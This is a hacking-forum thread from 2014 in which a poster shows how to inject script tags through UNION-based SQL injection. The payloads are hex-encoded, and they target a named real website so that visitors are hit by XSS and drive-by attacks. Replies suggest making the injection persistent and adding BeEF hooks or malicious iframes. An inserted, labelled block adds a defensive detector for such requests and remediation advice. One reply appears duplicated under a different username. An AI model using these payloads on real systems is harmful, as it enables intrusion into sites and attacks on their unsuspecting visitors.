EvilZone


: Let's add html with SQLi
: M1lak0 October 16, 2014, 02:21:28 PM
Why add HTML?
OK, the reason we do this is to execute XSS and drive-bys, and we can affect the visitors using this..
It increases our attack vectors, and it's an example of how SQLi can carry out attacks to affect the users/visitors..

Here is a way I found to add html with sql injection:

Click on it:
http://old.cageprisoners.com/articles.php?id=-25632 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) ,4,5,6-- -

It'll pop up with the DB version :)

Next you can add more tags like <h1></h1> shit and stuff with
http://old.cageprisoners.com/articles.php?id=-25632 UNION%20ALL SELECT 1,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e) ,4,5,6--%20-

Convert the tag <script>alert(' into hex, which is:
3c7363726970743e616c6572742827

so 0x3c7363726970743e616c6572742827

Next, convert the tag ');</script> into hex, which is:
27293b3c2f7363726970743e

so 0x27293b3c2f7363726970743e

We need <script>alert('version()');</script>
so,
concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) is what we will do and check the results..

Further experiment:
I tried injecting PHP code too, but I couldn't and failed..
Injecting PHP code could take this attack to a much higher level.
Please share any new methods regarding this if you find any..

Hex converter:
http://www.string-functions.com/string-hex.aspx

Hope this was interesting to you.. :)
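
Added example, not part of the original post: a defender-side check that decodes MySQL 0x... hex literals found in request URLs, the encoding used in the links above, and flags requests where a UNION SELECT carries hex that decodes to HTML tags. The function names, regexes and sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL hex literal: 0x plus an even run of hex digits (4+ bytes, skips small numbers)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")
# Decoded text that contains an opening or closing HTML tag
MARKUP = re.compile(r"</?[a-zA-Z][a-zA-Z0-9]*\b[^>]*>")
UNION_SELECT = re.compile(r"\bunion\b.+?\bselect\b", re.IGNORECASE | re.DOTALL)


def decode_hex_literals(url):
    """Return the decoded text of every 0x... literal in a request URL."""
    text = unquote_plus(url)  # undo %20, %28 ... before matching
    return [bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
            for m in HEX_LITERAL.finditer(text)]


def inspect_request(url):
    """Summarise one request: UNION SELECT present, decoded literals, markup hits."""
    literals = decode_hex_literals(url)
    markup = [s for s in literals if MARKUP.search(s)]
    union = bool(UNION_SELECT.search(unquote_plus(url)))
    return {"union_select": union, "decoded": literals,
            "html_in_hex": markup, "alert": union and bool(markup)}


# Constructed sample requests (not real log data); payload shape follows the post
SAMPLE_REQUESTS = [
    "/articles.php?id=42",
    "/articles.php?id=-1 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,"
    "version(),0x27293b3c2f7363726970743e),4,5,6-- -",
    "/articles.php?id=-1%20UNION%20ALL%20SELECT%201,2,concat(0x3c68313e,"
    "version%28%29,0x3c2f68313e),4,5,6--%20-",
    "/download.php?checksum=0x00ff10a4c3",  # hex literal that is not markup
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        result = inspect_request(req)
        print("ALERT" if result["alert"] else "ok   ", result["html_in_hex"], req[:45])
```

A hit means the id parameter reaches the SQL statement unparameterised and the selected column is written to the page without HTML encoding, so both need fixing in the application.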
: Re: Let's add html with SQLi
: Z3R0 October 16, 2014, 02:59:17 PM
Please take this as constructive criticism, but the way you presented this is absolutely fucking useless. You're not inserting them into columns, or anything that would make them persistent. Nobody is going to click on that long of a url without questioning your intentions. Don't misunderstand me, what you have is good; however, it is completely useless without inserting it into the database.

Additionally, you could have stated *WHY* somebody would want to inject xss over SQL. One example I can think of would be injecting javascript for a drive-by download or client-side exploit/malicious iframe/beef hook. Step your game up son!
: Let's add html with SQLi
: M1lak0 October 16, 2014, 03:23:31 PM
OK, well, thanks.. I made it very quickly as I had to switch off my system but wanted one up there in EZ.. Will surely take care of it, brother.. :)
Also, the long URL is there so that everybody gets the URL and understands it..
I don't post any bad URLs or malware here.. It's completely for learning purposes..
: Re: Let's add html with SQLi
: luigi October 19, 2014, 04:28:43 PM
if you can access the database you can simply edit fields adding html, can't you?
: Re: Let's add html with SQLi
: r00tcreat0r October 30, 2014, 02:40:08 PM
u should support to find out the database and draw the table xD instead of turning sql into xss. if u own the page.. u can do other malicious intention attack
: Re: Let's add html with SQLi
: Nortcele October 30, 2014, 03:20:25 PM
Please take this as constructive criticism, but the way you presented this is absolutely fucking useless. You're not inserting them into columns, or anything that would make them persistent. Nobody is going to click on that long of a url without questioning your intentions. Don't misunderstand me, what you have is good; however, it is completely useless without inserting it into the database.

Additionally, you could have stated *WHY* somebody would want to inject xss over SQL. One example I can think of would be injecting javascript for a drive-by download or client-side exploit/malicious iframe/beef hook. Step your game up son!
: Re: Let's add html with SQLi
: M1lak0 November 01, 2014, 04:47:02 AM
if you can access the database you can simply edit fields adding html, can't you?
: r00tcreat0r
u should support to find out the database and draw the table xD instead of turning sql into xss. if u own the page.. u can do other malicious intention attack
Dear, it's not always necessary that you exploit it every time and you get access to the credentials every time, you know if you tried sequel injection.. :)
Here it creates more attack vectors, you see.. Think of its advantage rather than discouraging..
: Re: Let's add html with SQLi
: nmeltdown November 24, 2014, 07:14:55 PM
It's nice to know, but like they said above, nobody is gonna click on a link that long. But this could be useful.